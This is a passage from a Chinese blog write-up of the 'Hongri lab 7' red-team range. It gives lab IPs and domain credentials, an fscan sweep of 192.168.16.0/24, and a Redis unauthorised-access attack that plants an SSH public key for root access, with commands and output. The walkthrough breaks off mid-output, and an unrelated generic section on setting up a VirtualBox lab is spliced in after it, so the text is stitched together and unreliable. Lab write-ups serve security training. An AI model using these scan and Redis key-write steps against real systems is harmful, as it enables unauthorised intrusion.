极品靶场,多种玩法【实战】红日靶场七:内网综合渗透

作者:Eason_LYC
悲观者预言失败,十言九中。 乐观者创造奇迹,一次即可。
一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!
技术领域:WEB安全、网络攻防
关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!
个人社区:极乐世界-技术至上
追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)

1. 靶场环境&内网拓扑

请添加图片描述

1.1 已知信息

攻击机:
  1. kali: 192.168.16.9 kail/kali
  2. win10攻击机(有全套工具):192.168.16.11 anti/anti@2022.asd
  3. 也可使用本地环境作为攻击机(连VPN)

仅知目标系统外网可访问网段为192.168.16.0/24

1.2 目标

1. 攻下右下角DC那台内网机器。

提示信息(正常渗透前不知,方便部署环境使用)

web7_oa 域账号 whoamianony.org\bunny 密码是 Bunny2021

域内账户

Administratir/Whoami2021 bunny/Bunny2021

攻击思路有两条

  1. 攻击机 ==》web1 ==》win7 ==》win7_pc2 ==》 DC
  2. 攻击机 ==》 web1(不能拿拿下时) ==》web2(攻击拿下) ==>再反向拿下web1和后续机器

2.本靶场使用到的工具

  • fscan
  • 哥斯拉v2.9.rar
  • iox.rar
  • laravel-CVE-2021-3129
  • 通达OA漏洞利用工具
  • KSMB.zip
  • mimikatz_trunk.zip

3. 内网渗透

3.1 【web1】渗透web1(192.168.16.148:81,内网ip192.168.52.10)

使用fscan扫描 ./fscan_amd64 -h 192.168.16.0/24 -o 192_168_16_result.txt 信息收集。可知第一个目标web1主机为192.168.16.148

漏洞一个是redis未授权访问,一个是laravel-cve-2021-3129。两种方法推荐redis的方式攻击,成功后直接为root权限,且攻击方便。

[*] Icmp alive hosts len is: 33
192.168.16.9:22 open
192.168.16.148:80 open
192.168.16.148:22 open
192.168.16.148:81 open
192.168.16.148:6379 open
[*] alive ports len is: 5
start vulscan
[+] Redis:192.168.16.148:6379 unauthorized file:/root/dump.rdb
[*] WebTitle: http://192.168.16.148:81  code:200 len:17474  title:Laravel
[+] InfoScan:http://192.168.16.148:81  [Laravel] 
[+] Redis:192.168.16.148:6379 like can write /root/.ssh/
[+] Redis:192.168.16.148:6379 like can write /var/spool/cron/
[*] WebTitle: http://192.168.16.148     code:502 len:584    title:502 Bad Gateway
[+] http://192.168.16.148:81 poc-yaml-laravel-cve-2021-3129 

3.1.1 redis未授权访问(上传公钥方式)

方法一:使用fscan工具直接完成公钥上传./fscan_amd64 -m redis -h 192.168.16.148 -rf /root/.ssh/id_rsa.pub

┌──(root㉿kali)-[/usr/share/github/fscan]
└─# ./fscan_amd64 -m redis -h 192.168.16.148 -rf /root/.ssh/id_rsa.pub 

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
-m  redis  start scan the port: 6379
start infoscan
(icmp) Target 192.168.16.148  is alive
[*] Icmp alive hosts len is: 1
192.168.16.148:6379 open
[*] alive ports len is: 1
start vulscan
[+] Redis:192.168.16.148:6379 unauthorized file:/root/dump.rdb
[+] Redis:192.168.16.148:6379 like can write /root/.ssh/
[+] 192.168.16.148:6379 SSH public key was written successfully
[+]</
### 构建红队内网渗透测试靶场环境 #### 选择合适的虚拟化平台 为了构建一个安全可控的实验环境,建议使用 VMware Workstation 或 VirtualBox 这样的桌面级虚拟化软件来创建多个虚拟机实例。这些工具允许灵活配置网络模式并支持快照功能以便快速恢复初始状态[^2]。 #### 设计合理的网络拓扑结构 通常会模拟企业内部常见的分层架构,包括但不限于 DMZ 区域、办公区以及核心服务区等不同逻辑分区。通过设置不同的子网划分各个区域,并利用路由器连接起来形成完整的局域网体系。 #### 部署典型的服务端应用 安装 Windows Server 和 Linux 发行版作为服务器操作系统,在其上架设 Web 应用程序(如 IIS/Apache)、数据库管理系统(MySQL/SQLServer)以及其他可能成为攻击目标的企业级服务组件。确保版本老旧存在已知漏洞以增加实战训练价值。 #### 搭建必要的客户端设备 除了上述提到的服务端节点外,还需要准备若干台运行着日常业务操作系统的客户终端,比如 Windows 7/10 工作站或是 Mac OS X 笔记本电脑。它们可以用来发起恶意流量或者充当被控制主机的角色参与演练过程。 #### 安全防护措施部署 尽管这是一个受控环境中进行的安全研究活动,但仍需遵循最小权限原则仅授予必要访问权给参与者;同时开启防火墙规则限制外部未授权接入尝试;定期备份重要数据文件以防意外丢失造成不可挽回损失。 ```bash # 创建一个新的虚拟网络接口用于隔离测试环境 vboxmanage hostonlyif create # 设置静态IP地址范围供后续分配给各VM使用 vboxmanage dhcpserver add --netname HostInterfaceOnlyNetwork \ --ip 192.168.56.1 --netmask 255.255.255.0 --lowerip 192.168.56.100 \ --upperip 192.168.56.200 --enable ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Eason_LYC

坚持下去,谢谢你的鼓励!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值